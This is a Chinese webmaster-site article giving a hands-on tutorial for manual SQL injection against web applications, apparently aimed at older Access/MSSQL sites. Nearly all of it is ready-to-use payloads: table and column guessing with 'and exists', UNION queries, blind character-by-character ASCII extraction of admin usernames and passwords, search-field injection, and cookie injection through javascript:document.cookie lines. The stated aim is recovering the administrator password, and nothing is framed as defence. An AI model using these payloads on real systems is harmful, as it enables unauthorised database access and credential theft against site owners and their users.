手工注入猜解语句教程

2022-9-24 12:59| 查看: 1916 |来源: 互联网

猜解表名： and exists (select * from 表名) 猜解列名： and exists (select 字段 from 表名) UNION法：联合查询： select name,password,id from user union select user,pwd,uid from 爆指定表名内容：

猜解表名：
and exists (select * from 表名)
猜解列名：
and exists (select 字段 from 表名)
UNION法：
联合查询：
select name,password,id from user union select user,pwd,uid from
爆指定表名内容：
and 1=1 union select 1,2,3,4,5 from 表名
ASCII逐字解码法：
1、猜解列长度
猜解语句：
and (select top 1 len(列名)from 表名)>N
and (select top 1 len(列名)from 表名)=N
其中N是数字，变换这个N的值猜解列长度，例如：
and (select top 1 len(列名)from 表名)>1
and (select top 1 len(列名)from 表名)>6
如果一直猜到6都显示正常页面，猜到7的时候返回错误（大于6并且小于等于7），那么该列的长度为7。因为“top 1”的意思是把最靠前的1条记录给提取出来，所以如果要猜解第二条记录就该使用：
select top 1 len(列名) from 表名
where 列名 not in (select top 1 列名 from 表名)
2、ASCII码分析法猜解用户和密码
ASC()函数和Mid函数
例如：mid(列名,N,1)
ASC(mdi(列名,N,1))得到“列名”第N位字符ASCII码
猜解语句为：
and (select top 1 asc(mid(字段,1,1)) from 数据库名)=ASC码(通过转换工具换)
区间判断语句：
“......between......and......”
中文处理法:
当ASCII转换后为“负数”使用abs()函数取绝对值。
例：and (select top 1 abs(asc(mid(字段,1,1))) from 数据库名)=ASC码(通过转换工具换)
ASCII逐字解码法的应用：
1、猜解表名：
and (select count(*) from admin)<>0
2、猜解列名：
and (select count(列名) from 表名)<>0
3、猜解管理员用户个数：
and (select count(*) from 表名)=1
返回正常，表中有一条记录。
4、猜解管理员用户名的长度：
and (select len(列名) from 表名)>=1、>=2、>=3、>=4。
5、猜解管理员用户名：
and (select count(*)from 表名 where (asc(mid(列名,1,1))) between 30 and 130)<>0
最后提交：
and (select asc(mid(列名,1,1)) from 表名)=ascii的值
6、猜解管理员的密码：
按照上面的原理，只要把上面的语句中(asc(mid(列名,1,1)的列名换成PASSWORD就能得到管理员的密码了。
搜索型注入漏洞利用猜解语句：
关键字%' and 1=1 and '%'='%
关键字%' and 1=2 and '%'='%
将and 1=1 换成注入语句就可以了。

cookie注入语句:
javascript:alert(document.cookie="id=" escape("44 and 1=1"));
javascript:alert(document.cookie="id=" escape("44 and 1=2"));
猜解语句:
猜解长度:
javascript:alert(document.cookie="id=" escape("44 and (select len(password) from admin)=16"))
猜解内容:
javascript:alert(document.cookie="id=" escape("44 and (select asc(mid(username)) from admin)=97"))

本文最后更新于 2022-9-24 12:59，某些文章具有时效性，若有错误或已失效，请在网站留言或联系站长：17tui@17tui.com

·END·

站长网微信号：w17tui，关注站长、创业、关注互联网人 - 互联网创业者营销服务中心

免责声明：本站部分文章和图片均来自用户投稿和网络收集，旨在传播知识，文章和图片版权归原作者及原出处所有，仅供学习与参考，请勿用于商业用途，如果损害了您的权利，请联系我们及时修正或删除。谢谢！

下一篇：扫不出肉鸡的常见原因一般都有哪些？上一篇：看黑客怎样汇编创建简单的窗口

17站长网微信二维码

始终以前瞻性的眼光聚焦站长、创业、互联网等领域，为您提供最新最全的互联网资讯，帮助站长转型升级，为互联网创业者提供更加优质的创业信息和品牌营销服务，与站长一起进步！让互联网创业者不再孤独！

扫一扫，关注站长网微信

手工注入猜解语句教程

大家都在看

相关分类

热门排行

最近更新